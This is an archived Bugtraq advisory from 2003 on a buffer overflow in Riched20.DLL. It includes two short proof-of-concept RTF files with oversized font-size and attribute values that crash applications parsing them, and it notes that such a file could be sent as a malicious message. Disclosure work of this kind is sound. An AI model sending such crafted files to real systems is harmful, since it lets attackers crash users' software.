Bugtraq mailing list archives

Riched20.DLL attribute label buffer overflow vulnerability

From: Jie Dong <Thkrdev () yoursft com>
Date: 16 Feb 2003 13:30:50 -0000



===========================================================================
=====
Security Defence Stdio vulnerability announcement [001]      
Riched20.DLL attribute label buffer overflow vulnerability
URL:http:\\www.yoursft.com
Author: Thrkdev
finds date&#65306;2003&#24180;2&#26376;1&#26085;
Announce date&#65306;2003&#24180;2&#26376;14&#26085;

Affected system:  Microsoft Windows 98
                    Microsoft Windows 2000
                    Microsoft Windows XP
               Perhaps,this vulnerability was still in other operating 
system, but untest . 
EMAIL:    Thkrdev () yoursft com
------------------------------------------------------------------------
Technical description:
  A buffer overflow vulnerability exists in riched20.dll,which can result 
in the collapse
of the application program that use the corresponding function of the DLL 
module, But it is
very difficult to have the effect of allowing an attacker to execute 
commands on a users system.
  
   This problem exists in the analysed RTF file code, and there is an 
overflows when drawing 
figure-string( such as the size of the character) in the file form .This 
overflow seem not to 
be used for executing commands. 
   The following RTFfile may result in illegal operation  :  
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
"\fs" was used for setting the size of the followingly 
words "www.yoursft.com".  when the figure-string
that set the size of the fonts exceeding 1024byte(>1024b) , it Will cause 
the buffer overflow ;And when
exceeding 65536byte(>65536b) it will probably cause crashing the 
application program.
This promblom Not only appear in the setting of "\fs" , other attribute 
will have the same problem under
the similar situation. And this following  RTF files Will also result in 
operating illegally : 
   {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
The terrible thing is nowadays lots of software was affected by this 
vulnerability. The attacker can send a 
malicious message that include exploiting the vulnerability, then when you 
read this message your program will be crashed. 
  
------------------------------------------------------------------------
Security Defence Stdio is a software development / technological websites, 
mainly developing NET security products ,
the software of Security Defence Stdio --Trojan Ender--  receives users' 
extensive favorable comment

Current thread:

Riched20.DLL attribute label buffer overflow vulnerability Jie Dong (Feb 17)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Thor Larholm (Feb 21)
  - Re: Riched20.DLL attribute label buffer overflow vulnerability Raistlin (Feb 24)
- <Possible follow-ups>
- Re: Riched20.DLL attribute label buffer overflow vulnerability 3APA3A (Feb 18)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Marc Ruef (Feb 25)